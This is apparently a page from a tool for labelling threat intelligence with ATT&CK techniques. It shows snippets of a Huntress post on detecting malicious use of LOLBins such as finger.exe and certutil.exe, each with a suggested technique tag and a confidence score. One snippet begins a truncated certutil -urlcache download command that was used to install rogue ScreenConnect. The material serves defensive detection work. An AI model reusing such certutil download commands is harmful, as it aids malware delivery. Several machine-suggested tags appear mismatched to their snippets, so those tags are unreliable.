“similar to the search for finger. exe, results in 2, 182, 554 hits, as illustrated in figure 2. refining the search to remove a great deal of the legitimate activity requires a good bit of time and effort, where doing specific searches for malicious activity seen by others can im…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
98%
“ems ) product. this activity was observed as an attempt to install a rogue screenconnect instance on the affected endpoints, and was blocked by installed security tools. the resulting command line, across multiple incidents, appears as follows : certutil - urlcache - f [ http / h…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
96%
“##eving command lines from the windows powershell event log event id 600 records, the command line shown in figure 3 invariably stands out as unique. another example of an “ lolbin ” that can be used for both legitimate and malicious purposes is certutil. exe, a command line util…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1218System Binary Proxy Execution
85%
“detecting malicious use of lolbins, pt. ii | huntress background windows endpoints ship “ out of the box ” with a great deal of functionality provided through both gui and command line utilities. these native utilities are often referred to as “ living off the land ” binaries, or…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1218.011Rundll32
62%
“. exe to create and manage user accounts, and how the use of this lolbin could be used, under different circumstances, as an effective detection of malicious activity. finger is a client - server application first developed in 1971 to allow users to query other systems on the net…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1055.001Dynamic-link Library Injection
46%
“detecting malicious use of lolbins, pt. ii | huntress background windows endpoints ship “ out of the box ” with a great deal of functionality provided through both gui and command line utilities. these native utilities are often referred to as “ living off the land ” binaries, or…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1218.011Rundll32
35%
“detecting malicious use of lolbins, pt. ii | huntress background windows endpoints ship “ out of the box ” with a great deal of functionality provided through both gui and command line utilities. these native utilities are often referred to as “ living off the land ” binaries, or…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
Rhetoric within the cybersecurity community has leaned heavily towards threat actor use of LOLBins as a means of “hiding amongst the noise” of normal, administrative and operational activity. However, as Huntress SOC analysts can attest, this is often far from the case.